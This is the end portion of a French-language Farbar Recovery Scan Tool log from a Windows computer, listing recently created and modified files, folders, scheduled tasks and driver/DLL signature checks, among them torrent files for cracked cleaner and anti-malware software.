2021-06-22 14:34 - 2021-06-22 14:34 - 000452608 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\inetcpl.cpl
2021-06-22 14:34 - 2021-06-22 14:34 - 000084992 _____ (Microsoft Corporation) C:\WINDOWS\system32\wscui.cpl
2021-06-22 14:34 - 2021-06-22 14:34 - 000067584 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wscui.cpl
2021-06-22 14:34 - 2021-06-22 14:34 - 000060928 _____ C:\WINDOWS\system32\runexehelper.exe
2021-06-22 14:33 - 2021-06-22 14:33 - 002260992 _____ C:\WINDOWS\system32\TextInputMethodFormatter.dll
2021-06-22 14:33 - 2021-06-22 14:33 - 000097792 _____ C:\WINDOWS\system32\Drivers\cimfs.sys
2021-06-22 13:55 - 2021-07-05 22:05 - 000000000 ____D C:\Program Files (x86)\SlimCleaner
2021-06-22 12:38 - 2021-06-22 12:39 - 035958288 _____ (Piriform Software Ltd) C:\Users\eddy99\Downloads\ccsetup582.exe
2021-06-21 23:11 - 2021-07-18 14:13 - 000000000 ____D C:\WINDOWS\system32\Tasks\Norton Security with Backup
2021-06-21 23:10 - 2021-06-21 23:10 - 000003376 _____ C:\WINDOWS\system32\Tasks\Norton WSC Integration
2021-06-21 23:10 - 2021-06-21 23:10 - 000000000 ___RD C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Norton Security
2021-06-21 19:53 - 2021-06-21 19:53 - 000006965 _____ C:\Users\eddy99\Downloads\CCleaner Bundle Professional Plus v5.81.torrent
2021-06-20 17:57 - 2021-06-20 17:59 - 000000000 ____D C:\ProgramData\PC Cleaner
2021-06-20 16:07 - 2021-06-20 16:07 - 000000644 _____ C:\ProgramData\SMRResults540.dat
2021-06-20 15:56 - 2021-06-20 16:06 - 000000000 ____D C:\Users\eddy99\AppData\Local\NPE
2021-06-20 14:27 - 2021-06-20 14:27 - 000000000 ____D C:\Program Files (x86)\WinRAR
2021-06-20 12:28 - 2021-06-20 12:28 - 000002623 _____ C:\Users\eddy99\Downloads\Malwarebytes.Anti-Malware.Premium.4.2.0.82.incl.License.[CrackingPatching].torrent
2021-06-20 12:26 - 2021-06-20 12:26 - 000018591 _____ C:\Users\eddy99\Downloads\CCleaner.v5.74.8198.éditions.Pro.&.Business.multi.+.licence.[WIN].torrent
==================== Un mois (modifiés) ==================
(Si un élément est inclus dans le fichier fixlist.txt, le fichier/dossier sera déplacé.)
2021-07-18 14:20 - 2020-12-16 22:34 - 000000000 ____D C:\Users\eddy99\AppData\Roaming\uTorrent
2021-07-18 14:19 - 2021-04-09 21:35 - 000080096 _____ C:\WINDOWS\ZAM.krnl.trace
2021-07-18 14:15 - 2020-12-16 14:59 - 001772726 _____ C:\WINDOWS\system32\PerfStringBackup.INI
2021-07-18 14:15 - 2019-12-07 16:49 - 000791762 _____ C:\WINDOWS\system32\perfh00C.dat
2021-07-18 14:15 - 2019-12-07 16:49 - 000149928 _____ C:\WINDOWS\system32\perfc00C.dat
2021-07-18 14:15 - 2019-12-07 11:13 - 000000000 ____D C:\WINDOWS\INF
2021-07-18 14:14 - 2020-12-16 15:06 - 000000000 ___RD C:\Users\eddy99\OneDrive
2021-07-18 14:10 - 2020-12-15 02:32 - 000000000 ____D C:\Program Files (x86)\Google
2021-07-18 14:10 - 2013-03-11 21:03 - 000000000 ____D C:\ProgramData\NVIDIA
2021-07-18 14:08 - 2020-12-16 14:36 - 000008192 ___SH C:\DumpStack.log.tmp
2021-07-18 14:08 - 2020-11-19 01:29 - 000000006 ____H C:\WINDOWS\Tasks\SA.DAT
2021-07-18 14:08 - 2019-12-07 11:14 - 000000000 ____D C:\ProgramData\regid.1991-06.com.microsoft
2021-07-18 14:07 - 2020-12-15 02:45 - 000000000 ____D C:\Users\eddy99\AppData\Local\ClassicShell
2021-07-18 14:07 - 2019-12-07 11:03 - 000524288 _____ C:\WINDOWS\system32\config\BBI
2021-07-18 13:59 - 2020-12-15 03:16 - 000000000 ____D C:\Users\eddy99\AppData\LocalLow\Mozilla
2021-07-18 13:55 - 2020-12-16 21:06 - 000000000 ____D C:\Users\eddy99\AppData\Local\Epic Privacy Browser
2021-07-18 13:41 - 2020-12-15 14:10 - 000000000 ____D C:\Users\eddy99\AppData\Roaming\ZHP
2021-07-18 13:26 - 2021-06-01 08:23 - 003258008 _____ (Nicolas Coolman) C:\Users\eddy99\ZHPCleaner.exe
2021-07-18 13:26 - 2020-12-16 14:47 - 000000000 ____D C:\Users\eddy99
2021-07-18 13:23 - 2020-11-19 00:28 - 000000000 ____D C:\WINDOWS\system32\SleepStudy
2021-07-18 12:08 - 2020-12-20 23:25 - 000000000 ____D C:\Users\eddy99\OneDrive\Documents\MesPagesWeb
2021-07-18 12:07 - 2021-06-13 16:03 - 000000000 ____D C:\WINDOWS\system32\Tasks\NCH Software
2021-07-18 12:07 - 2021-06-13 16:03 - 000000000 ____D C:\ProgramData\NCH Software
2021-07-18 12:07 - 2021-06-13 16:03 - 000000000 ____D C:\Program Files (x86)\NCH Software
2021-07-18 12:06 - 2021-01-15 20:31 - 000000000 ____D C:\Users\eddy99\AppData\Local\D3DSCache
2021-07-18 11:29 - 2020-12-15 02:27 - 000000000 ____D C:\Users\eddy99\AppData\Local\CrashDumps
2021-07-18 09:02 - 2019-12-07 11:14 - 000000000 ____D C:\WINDOWS\AppReadiness
2021-07-18 00:20 - 2021-04-13 13:19 - 000000000 ____D C:\Users\eddy99\AppData\Roaming\qBittorrent
2021-07-17 18:43 - 2020-11-19 01:31 - 000002446 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Edge.lnk
2021-07-17 18:43 - 2019-12-07 11:14 - 000000000 ___HD C:\Program Files\WindowsApps
2021-07-17 15:31 - 2021-04-09 21:35 - 000000000 ____D C:\Users\eddy99\AppData\Local\AMSDK
2021-07-17 15:30 - 2020-12-15 02:40 - 000000000 ____D C:\ProgramData\Malwarebytes' Anti-Malware (portable)
2021-07-17 15:17 - 2021-03-07 15:11 - 000192952 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\mbamchameleon.sys
2021-07-16 20:35 - 2020-12-15 03:16 - 000000000 ____D C:\ProgramData\Mozilla
2021-07-16 20:00 - 2020-12-15 03:16 - 000000000 ____D C:\Program Files (x86)\Mozilla Maintenance Service
2021-07-16 13:26 - 2020-12-16 14:54 - 000003588 _____ C:\WINDOWS\system32\Tasks\GoogleUpdateTaskMachineUA
2021-07-16 13:26 - 2020-12-16 14:54 - 000003464 _____ C:\WINDOWS\system32\Tasks\GoogleUpdateTaskMachineCore
2021-07-15 19:45 - 2020-12-16 15:06 - 000003366 _____ C:\WINDOWS\system32\Tasks\OneDrive Standalone Update Task-S-1-5-21-3835626661-1005971116-1630247016-1002
2021-07-15 19:45 - 2020-12-16 14:47 - 000002428 _____ C:\Users\eddy99\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\OneDrive.lnk
2021-07-15 13:37 - 2020-11-19 00:28 - 000279848 _____ C:\WINDOWS\system32\FNTCACHE.DAT
2021-07-15 13:35 - 2019-12-07 11:14 - 000000000 ____D C:\WINDOWS\SystemResources
2021-07-15 13:35 - 2019-12-07 11:14 - 000000000 ____D C:\WINDOWS\system32\WinBioPlugIns
2021-07-15 13:35 - 2019-12-07 11:14 - 000000000 ____D C:\WINDOWS\bcastdvr
2021-07-15 13:35 - 2019-12-07 11:14 - 000000000 ____D C:\Program Files\Common Files\System
2021-07-15 12:59 - 2019-12-07 11:03 - 000000000 ____D C:\WINDOWS\CbsTemp
2021-07-15 12:37 - 2020-12-16 15:10 - 000000000 ____D C:\WINDOWS\system32\MRT
2021-07-15 12:33 - 2012-11-05 19:14 - 133422552 ____C (Microsoft Corporation) C:\WINDOWS\system32\MRT.exe
2021-07-15 11:58 - 2021-03-16 20:46 - 000000000 ____D C:\ProgramData\FxSound
2021-07-15 11:57 - 2021-03-16 20:39 - 000000000 ____D C:\WINDOWS\system32\Tasks\FxSound
2021-07-15 11:03 - 2021-03-16 20:39 - 000000000 ____D C:\Users\eddy99\AppData\Roaming\FxSound
2021-07-15 09:59 - 2021-02-03 23:57 - 000000000 ____D C:\Users\eddy99\AppData\Local\ElevatedDiagnostics
2021-07-15 09:55 - 2021-01-13 19:21 - 000000000 ____D C:\Program Files (x86)\Mozilla Thunderbird
2021-07-15 09:55 - 2019-12-07 11:03 - 000032768 _____ C:\WINDOWS\system32\config\ELAM
2021-07-14 18:06 - 2020-12-15 03:16 - 000001217 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Mozilla Thunderbird.lnk
2021-07-13 23:21 - 2021-02-10 19:58 - 000002140 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Acrobat Reader DC.lnk
2021-07-13 17:38 - 2020-12-15 02:09 - 000000000 ____D C:\Users\eddy99\AppData\Local\Packages
2021-07-12 00:50 - 2019-12-07 11:10 - 000383488 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dpnet.dll
2021-07-12 00:50 - 2019-12-07 11:10 - 000215552 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dplayx.dll
2021-07-12 00:50 - 2019-12-07 11:10 - 000060928 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dpnathlp.dll
2021-07-12 00:50 - 2019-12-07 11:10 - 000045568 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dpwsockx.dll
2021-07-12 00:50 - 2019-12-07 11:10 - 000023552 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dpmodemx.dll
2021-07-12 00:50 - 2019-12-07 11:10 - 000022528 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dpnsvr.exe
2021-07-12 00:50 - 2019-12-07 11:10 - 000020480 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dplaysvr.exe
2021-07-12 00:50 - 2019-12-07 11:10 - 000008192 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dpnhupnp.dll
2021-07-12 00:50 - 2019-12-07 11:10 - 000008192 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dpnhpast.dll
2021-07-12 00:50 - 2019-12-07 11:10 - 000005120 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dpnlobby.dll
2021-07-12 00:50 - 2019-12-07 11:10 - 000005120 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dpnaddr.dll
2021-07-12 00:50 - 2019-12-07 11:09 - 000494592 _____ (Microsoft Corporation) C:\WINDOWS\system32\dpnet.dll
2021-07-12 00:50 - 2019-12-07 11:09 - 000070656 _____ (Microsoft Corporation) C:\WINDOWS\system32\dpnathlp.dll
2021-07-12 00:50 - 2019-12-07 11:09 - 000028672 _____ (Microsoft Corporation) C:\WINDOWS\system32\dpnsvr.exe
2021-07-12 00:50 - 2019-12-07 11:09 - 000010240 _____ (Microsoft Corporation) C:\WINDOWS\system32\dpnhupnp.dll
2021-07-12 00:50 - 2019-12-07 11:09 - 000010240 _____ (Microsoft Corporation) C:\WINDOWS\system32\dpnhpast.dll
2021-07-12 00:50 - 2019-12-07 11:09 - 000006144 _____ (Microsoft Corporation) C:\WINDOWS\system32\dpnlobby.dll
2021-07-12 00:50 - 2019-12-07 11:09 - 000006144 _____ (Microsoft Corporation) C:\WINDOWS\system32\dpnaddr.dll
2021-07-10 19:28 - 2019-12-07 16:51 - 000000000 ____D C:\WINDOWS\system32\OpenSSH
2021-07-10 19:28 - 2019-12-07 16:49 - 000000000 ____D C:\WINDOWS\SysWOW64\fr
2021-07-10 19:28 - 2019-12-07 16:49 - 000000000 ____D C:\WINDOWS\system32\fr
2021-07-10 19:28 - 2019-12-07 11:14 - 000000000 ___SD C:\WINDOWS\SysWOW64\F12
2021-07-10 19:28 - 2019-12-07 11:14 - 000000000 ___SD C:\WINDOWS\SysWOW64\DiagSvcs
2021-07-10 19:28 - 2019-12-07 11:14 - 000000000 ___SD C:\WINDOWS\system32\UNP
2021-07-10 19:28 - 2019-12-07 11:14 - 000000000 ___SD C:\WINDOWS\system32\F12
2021-07-10 19:28 - 2019-12-07 11:14 - 000000000 ___SD C:\WINDOWS\system32\dsc
2021-07-10 19:28 - 2019-12-07 11:14 - 000000000 ___SD C:\WINDOWS\system32\DiagSvcs
2021-07-10 19:28 - 2019-12-07 11:14 - 000000000 ___RD C:\WINDOWS\PrintDialog
2021-07-10 19:28 - 2019-12-07 11:14 - 000000000 ___HD C:\WINDOWS\ELAMBKUP
2021-07-10 19:28 - 2019-12-07 11:14 - 000000000 ____D C:\WINDOWS\SysWOW64\WinMetadata
2021-07-10 19:28 - 2019-12-07 11:14 - 000000000 ____D C:\WINDOWS\SysWOW64\setup
2021-07-10 19:28 - 2019-12-07 11:14 - 000000000 ____D C:\WINDOWS\SysWOW64\PerceptionSimulation
2021-07-10 19:28 - 2019-12-07 11:14 - 000000000 ____D C:\WINDOWS\SysWOW64\oobe
2021-07-10 19:28 - 2019-12-07 11:14 - 000000000 ____D C:\WINDOWS\SysWOW64\migwiz
2021-07-10 19:28 - 2019-12-07 11:14 - 000000000 ____D C:\WINDOWS\SysWOW64\InstallShield
2021-07-10 19:28 - 2019-12-07 11:14 - 000000000 ____D C:\WINDOWS\SysWOW64\downlevel
2021-07-10 19:28 - 2019-12-07 11:14 - 000000000 ____D C:\WINDOWS\SysWOW64\Dism
2021-07-10 19:28 - 2019-12-07 11:14 - 000000000 ____D C:\WINDOWS\SysWOW64\Com
2021-07-10 19:28 - 2019-12-07 11:14 - 000000000 ____D C:\WINDOWS\SysWOW64\AdvancedInstallers
2021-07-10 19:28 - 2019-12-07 11:14 - 000000000 ____D C:\WINDOWS\system32\WinMetadata
2021-07-10 19:28 - 2019-12-07 11:14 - 000000000 ____D C:\WINDOWS\system32\SystemResetPlatform
2021-07-10 19:28 - 2019-12-07 11:14 - 000000000 ____D C:\WINDOWS\system32\Sysprep
2021-07-10 19:28 - 2019-12-07 11:14 - 000000000 ____D C:\WINDOWS\system32\ShellExperiences
2021-07-10 19:28 - 2019-12-07 11:14 - 000000000 ____D C:\WINDOWS\system32\setup
2021-07-10 19:28 - 2019-12-07 11:14 - 000000000 ____D C:\WINDOWS\system32\PerceptionSimulation
2021-07-10 19:28 - 2019-12-07 11:14 - 000000000 ____D C:\WINDOWS\system32\oobe
2021-07-10 19:28 - 2019-12-07 11:14 - 000000000 ____D C:\WINDOWS\system32\migwiz
2021-07-10 19:28 - 2019-12-07 11:14 - 000000000 ____D C:\WINDOWS\system32\Keywords
2021-07-10 19:28 - 2019-12-07 11:14 - 000000000 ____D C:\WINDOWS\system32\downlevel
2021-07-10 19:28 - 2019-12-07 11:14 - 000000000 ____D C:\WINDOWS\system32\Dism
2021-07-10 19:28 - 2019-12-07 11:14 - 000000000 ____D C:\WINDOWS\system32\Com
2021-07-10 19:28 - 2019-12-07 11:14 - 000000000 ____D C:\WINDOWS\system32\AdvancedInstallers
2021-07-10 19:28 - 2019-12-07 11:14 - 000000000 ____D C:\WINDOWS\ShellExperiences
2021-07-10 19:28 - 2019-12-07 11:14 - 000000000 ____D C:\WINDOWS\ShellComponents
2021-07-10 19:28 - 2019-12-07 11:03 - 000000000 ____D C:\WINDOWS\servicing
2021-07-10 19:27 - 2019-12-07 16:53 - 000000000 ____D C:\Program Files\Windows Portable Devices
2021-07-10 19:27 - 2019-12-07 16:53 - 000000000 ____D C:\Program Files\Windows Photo Viewer
2021-07-10 19:27 - 2019-12-07 16:53 - 000000000 ____D C:\Program Files\Windows Multimedia Platform
2021-07-10 19:27 - 2019-12-07 16:53 - 000000000 ____D C:\Program Files (x86)\Windows Portable Devices
2021-07-10 19:27 - 2019-12-07 16:53 - 000000000 ____D C:\Program Files (x86)\Windows Photo Viewer
2021-07-10 19:27 - 2019-12-07 16:53 - 000000000 ____D C:\Program Files (x86)\Windows Multimedia Platform
2021-07-10 19:27 - 2019-12-07 11:14 - 000000000 ___RD C:\WINDOWS\ImmersiveControlPanel
2021-07-10 19:27 - 2019-12-07 11:14 - 000000000 ____D C:\WINDOWS\IME
2021-07-10 19:06 - 2019-12-07 11:14 - 000000000 ____D C:\WINDOWS\Containers
2021-07-10 17:14 - 2019-12-07 11:14 - 000000000 ____D C:\WINDOWS\registration
2021-07-10 14:03 - 2021-06-06 19:46 - 000000000 ____D C:\Users\eddy99\OneDrive\Documents\Apowersoft PDF Converter
2021-07-04 15:39 - 2013-03-11 21:07 - 000000000 ____D C:\WINDOWS\SysWOW64\RTCOM
2021-07-04 15:02 - 2021-03-16 20:33 - 000000000 ____D C:\Users\eddy99\AppData\Roaming\FxSound LLC
2021-07-02 23:10 - 2020-12-16 10:26 - 000000000 ____D C:\ProgramData\Package Cache
2021-07-02 09:37 - 2020-11-19 01:31 - 000003634 _____ C:\WINDOWS\system32\Tasks\MicrosoftEdgeUpdateTaskMachineUA
2021-07-02 09:37 - 2020-11-19 01:31 - 000003510 _____ C:\WINDOWS\system32\Tasks\MicrosoftEdgeUpdateTaskMachineCore
2021-07-01 19:55 - 2020-12-15 02:32 - 000002249 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk
2021-06-30 20:26 - 2021-03-10 14:34 - 000000153 _____ C:\config.ini
2021-06-30 20:17 - 2019-12-07 11:14 - 000000000 ____D C:\WINDOWS\system32\NDF
2021-06-30 20:16 - 2012-11-05 19:52 - 000000000 ___HD C:\Program Files (x86)\InstallShield Installation Information
2021-06-30 20:14 - 2021-03-10 14:18 - 000000000 ____D C:\Users\eddy99\AppData\Local\TP-Link
2021-06-30 20:13 - 2020-12-15 02:03 - 000000000 ____D C:\temp
2021-06-27 10:37 - 2019-12-07 11:14 - 000000000 ____D C:\WINDOWS\LiveKernelReports
2021-06-22 15:59 - 2019-12-07 11:14 - 000000000 ____D C:\WINDOWS\Provisioning
2021-06-21 23:36 - 2020-12-15 02:34 - 000000000 ____D C:\Program Files\Common Files\AV
2021-06-21 23:10 - 2020-12-15 02:23 - 000000000 ____D C:\WINDOWS\system32\Drivers\NGCx64
2021-06-20 15:56 - 2020-12-15 02:22 - 000000000 ____D C:\ProgramData\Norton
2021-06-20 14:27 - 2021-06-15 15:14 - 000001134 _____ C:\ProgramData\Microsoft\Windows\Start Menu\WinRAR.lnk
2021-06-20 14:27 - 2021-06-15 15:14 - 000000000 ____D C:\Users\eddy99\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\WinRAR
2021-06-20 14:27 - 2021-06-15 15:14 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\WinRAR
2021-06-18 19:33 - 2021-02-20 21:38 - 000000000 ____D C:\Program Files\Microsoft Update Health Tools
==================== Fichiers à la racine de certains dossiers ========
2021-06-20 16:07 - 2021-06-20 16:07 - 000000644 _____ () C:\ProgramData\SMRResults540.dat
2021-06-01 08:23 - 2021-07-18 13:26 - 003258008 _____ (Nicolas Coolman) C:\Users\eddy99\ZHPCleaner.exe
2021-04-13 15:30 - 2021-05-08 17:51 - 000007667 _____ () C:\Users\eddy99\AppData\Local\resmon.resmoncfg
==================== SigCheckExt =========================
2020-12-20 23:29 - 2011-11-25 14:09 - 000312832 ____N (Brother Industries, Ltd.) C:\WINDOWS\system32\BrFaxTxAppRun64.dll
2020-12-20 23:29 - 2012-07-27 07:07 - 000087040 ____R (Brother Industries, Ltd.) C:\WINDOWS\system32\BrNetSti.dll
2020-12-20 23:29 - 2012-06-12 09:38 - 000054272 ____R (Brother Industries,Ltd) C:\WINDOWS\system32\Brnsplg.dll
2020-12-20 23:29 - 2005-04-22 06:36 - 000143360 ____R C:\WINDOWS\system32\BrSNMP64.dll
2020-12-20 23:29 - 2012-04-11 06:27 - 000058880 ____R (Brother Industries,Ltd.) C:\WINDOWS\system32\BrWiaNCp.dll
2012-07-25 22:22 - 2012-07-26 05:07 - 007300096 _____ (Intel Corporation) C:\WINDOWS\system32\igd10umd64.dll
2012-07-25 22:22 - 2012-07-26 05:07 - 007228416 _____ (Intel Corporation) C:\WINDOWS\system32\igdumd64.dll
2012-07-25 22:22 - 2012-07-26 05:07 - 000243712 _____ (Intel Corporation) C:\WINDOWS\system32\iglhcp64.dll
2012-07-25 22:22 - 2012-07-26 05:07 - 000524800 _____ (Intel Corporation) C:\WINDOWS\system32\iglhsip64.dll
2020-12-20 23:29 - 2012-03-19 06:09 - 000316928 ____R (brother) C:\WINDOWS\system32\NSSRH64.dll
2017-08-13 09:49 - 2017-08-13 09:49 - 000291128 _____ (IvoSoft) C:\WINDOWS\system32\StartMenuHelper64.dll
2021-03-10 14:33 - 2010-03-15 20:45 - 000073728 ____N (Brother Industries Ltd.) C:\WINDOWS\SysWOW64\BrDctF2.dll
2021-03-10 14:33 - 2007-12-13 23:16 - 000005120 ____N (Brother Industries Ltd.) C:\WINDOWS\SysWOW64\BrDctF2L.dll
2021-03-10 14:33 - 2012-07-09 18:19 - 000005120 ____N (Brother Industries Ltd.) C:\WINDOWS\SysWOW64\BrDctF2S.dll
2013-03-11 20:35 - 2012-11-02 12:41 - 000053248 _____ (Windows XP Bundled build C-Centric Single User) C:\WINDOWS\SysWOW64\CSVer.dll
2012-06-24 01:24 - 2012-06-24 01:24 - 005892608 _____ (Intel Corporation) C:\WINDOWS\SysWOW64\igd10umd32.dll
2012-07-25 22:22 - 2012-06-24 01:24 - 005895680 _____ (Intel Corporation) C:\WINDOWS\SysWOW64\igdumd32.dll
2012-07-25 22:22 - 2012-06-02 16:32 - 000201216 _____ (Intel Corporation) C:\WINDOWS\SysWOW64\iglhcp32.dll
2012-07-25 22:22 - 2012-06-02 16:32 - 000519680 _____ (Intel Corporation) C:\WINDOWS\SysWOW64\iglhsip32.dll
2012-07-27 12:36 - 2012-07-27 12:36 - 000001536 _____ C:\WINDOWS\SysWOW64\IusEventLog.dll
2006-07-11 19:43 - 2006-07-11 19:43 - 001060864 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfc71.dll
2006-07-11 20:02 - 2006-07-11 20:02 - 001053184 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfc71u.dll
2013-03-11 21:59 - 2013-03-11 21:59 - 000499712 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msvcp71.dll
2006-07-11 19:35 - 2006-07-11 19:35 - 000348160 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msvcr71.dll
2021-03-10 14:33 - 2012-03-19 14:09 - 000245760 ____N (brother) C:\WINDOWS\SysWOW64\NSSearch.dll
2017-08-13 09:49 - 2017-08-13 09:49 - 000248120 _____ (IvoSoft) C:\WINDOWS\SysWOW64\StartMenuHelper32.dll
2005-09-07 14:03 - 2005-09-07 14:03 - 000722192 ____R (Microsoft Corporation) C:\WINDOWS\SysWOW64\Vb40032.dll
2008-08-07 12:50 - 2008-08-07 12:50 - 001261568 _____ (Zeon International Investment Corp. ) C:\WINDOWS\SysWOW64\ZDImage2pdf7.dll
2013-03-11 20:36 - 2012-11-16 03:32 - 000008192 _____ (Intel Corporation) C:\WINDOWS\system32\Drivers\IntelMEFWVer.dll
2021-06-01 08:23 - 2021-07-18 13:26 - 003258008 _____ (Nicolas Coolman) C:\Users\eddy99\ZHPCleaner.exe
2021-07-16 17:34 - 2021-07-16 17:34 - 064650240 _____ (The Chromium Authors) C:\Users\eddy99\Downloads\chromium_93-0-4578_en_432989_32.exe
2020-12-15 14:28 - 2020-12-15 14:28 - 000380928 _____ C:\Users\eddy99\Downloads\imgtq9nk-2.2.19882.exe
2021-06-25 23:24 - 2018-01-30 09:46 - 043482128 ____R C:\Users\eddy99\Downloads\Setup.exe
2021-01-05 23:21 - 2020-12-25 17:38 - 000611328 ____R C:\Users\eddy99\OneDrive\Documents\chrome_elf.dll
2021-04-13 13:18 - 2021-04-13 13:18 - 026724770 _____ (The qBittorrent project) C:\Users\eddy99\OneDrive\Documents\qbittorrent_4.3.4.1_x64_setup.exe
==================== SigCheck ============================
(Il n'y a pas de correction automatique pour les fichiers qui ne satisfont pas à la vérification.)
==================== Fin de FRST.txt ========================